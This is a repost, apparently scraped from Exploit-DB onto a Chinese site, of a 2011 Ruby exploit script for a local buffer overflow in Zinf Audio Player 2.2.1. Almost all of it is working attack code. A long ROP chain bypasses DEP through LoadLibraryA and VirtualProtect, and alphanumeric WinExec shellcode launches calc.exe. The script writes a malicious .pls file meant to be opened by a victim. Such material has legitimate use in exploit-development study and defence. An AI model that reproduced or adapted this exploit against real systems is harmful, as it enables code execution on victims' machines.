Zinf Audio Player 2.2.1 – ‘.pls’ Local Buffer Overflow (DEP Bypass)

Exploit Database
104 阅读

作者： C4SS!0 & h1ch4m

日期： 2011-08-03
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/17600/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

#!/usr/bin/ruby

#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)

#[+]Date: 03\08\2011

#[+]Author: C4SS!0 and h1ch4m

#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)

#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download

#[+]Version: 2.2.1

#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)

#[+]CVE: N/A

#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/

#LoadLibraryA("msvcr71.dll") + VirtualProtect()

sys = <code>ver

if sys =~/Windows/

system("cls")

system("color 4f")

else

system("clear")

end

print '''

Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)

Created by C4SS!0 and h1ch4m

E-mails:

C4SS!0 : louredo_@hotmail.com

h1ch4m : h1ch4m@hotmail.com

Sites:

C4SS!0 : net-fuzzer.blogspot.com

h1ch4m : net-effects.blogspot.com

'''

sleep(3)

#Endereco para VirtualProtect 0x7C3528DD

#########################################ROP FOR LOAD "msvcr71.dll"#################################

rop = [0x10002a6f].pack('V') # PUSH ESP # POP EDI # POP ESI # POP EBP # MOV EAX,1 # POP EBX # ADD ESP,30 # RETN

rop += "A" * 12

rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // Funcao de retorno da LoadLibraryA , Depois de executar LoadLibraryA vem para AQUI.!!!

rop += "A" * (80-rop.length)

rop += [0x100014e8].pack('V') # MOV EAX,EDI # POP EDI # POP ESI # RETN

rop += "G"* 8 # JUNK

rop += [0x1205017d].pack('V') # POP EBX # RETN

rop += "\x00\x00\x00\x00"

rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN

rop += [0x112054dd].pack('V') # XCHG EAX,EBP # RETN REPLACE

rop += [0x00420044].pack('V') # POP EBP # RETN

rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // Funcao de retorno da LoadLibraryA , Depois de executar LoadLibraryA vem para AQUI.!!!

rop += [0x10001E11].pack('V') # POP EDI # RETN

rop += [0x7C801D7B].pack('V') # Endereco para LoadLibraryA// Conserta o valor de EDI para o PUSHAD

rop += [0x1200CA76].pack('V') # PUSHAD # RETN

rop += "msvcr71.dll\x00"

rop += "D" * 56

##########################################ROP END HERE####################################

##########################################ROP FOR VirtualProtect###########################

rop += [0x1200edf1].pack('V') # POP EDI # RETN

rop += "JJJJ" # JUNK

rop += [0x7C3528DD].pack('V') # Ponteiro para VirtualProtect

rop += [0x00409E6A].pack('V') # MOV EAX,EBX # POP EBX #RETN 0c

rop += "PPPP"

rop += [0x0042044B].pack('V') * 3 # RETN

rop += [0x0040dc54].pack('V') # PUSH ESI # ADD AL,5E # POP EBP # RETN 04

############################ADICIONANDO A EAX######################################

rop += [0x7C3410C3].pack('V') # POP ECX # RETN

rop += [0x00000200].pack('V') # O valor que sera adicionado a EAX

rop += [0x7C358F2C].pack('V') # ADD EAX,ECX # POP ESI # RETN

rop += "GGGG"

#####################################################################################

rop += [0x0040fd82].pack('V') # XCHG EAX,ECX # POP EBP # RETN

rop += "BBBB"

rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN

rop += [0x1060fd8f].pack('V') # XCHG EAX,EBP # RETN

################################MUDA O ENDEREÇO DO PARAMETRO#######################################

rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN

rop += [0x12007AD6].pack('V') # POP EBX # RETN

rop += "\x00\x00\x00\x00"

rop += [0x7c3451b9].pack('V') # POP EDX # RETN

rop += "\x00\x00\x00\x00"

rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN//Endereço do ultimo paramentro de VirtualProtect

rop += [0x1000333e].pack('V') # ADD EDX,EBX # POP EBX # RETN 10

rop += "QQQQ"

rop += [0x12007AD7].pack('V') * 10 # RETN

###################################################################################################

rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN// Endereco disponivel

rop += [0x12011D0B].pack('V') # XCHG EAX,ECX # CMP EAX,5E5F0002 # RETN

rop += [0x12007AD7].pack('V') # RETN

rop += [0x10001436].pack('V') # MOV EAX,ECX # POP EBX # RETN

rop += "GGGG"

rop += [0x12007AD6].pack('V') # POP EBX # RETN

rop += "\x00\x03\x00\x00"

rop += [0x11601da9].pack('V') # POP EAX # RETN

rop += "\x40\x00\x00\x00"

rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN

rop += [0x12026C85].pack('V') # PUSHAD # RETN

rop += "A" * 156

#########################Ir para o shellcode depois da funçao VirtualProtect###############

rop += [0x10002e13].pack('V')# ADD EAX,ECX # RETN

rop += [0x10610e4d].pack('V')# POP ECX # RETN

rop += [0x0000012b].pack('V')# Valor que sera adicionado a EAX

rop += [0x10002e13].pack('V')# ADD EAX,ECX # RETN

rop += [0x111025F1].pack('V')# CALL EAX and JMP to my Shellcode. :)

##########################################ROP END HERE#####################################

shellcode = "\x44" * (50-0x12)

shellcode +=

"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK"+

"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO"+

"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9"+ #Shellcode Alpha Numeric WinExec "Calc.exe"

"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ"+ #Baseaddress EAX.

"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN"+

"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8"+

"WDN0SUK8WOMV4DNNTWPYWN27KA"

buf = "A" * 1300

buf += rop

buf += shellcode

print "\t\t[+]Creating Exploit File...\n"

sleep(1)

begin

File.open("Exploit.pls","wb") do |f|

f.write buf

f.close

print "\t\t[+]File Exploit.pls create successfully.\n"

sleep(1)

end

rescue

print "**[-]Error: #{$!}\n"

exit(0)

end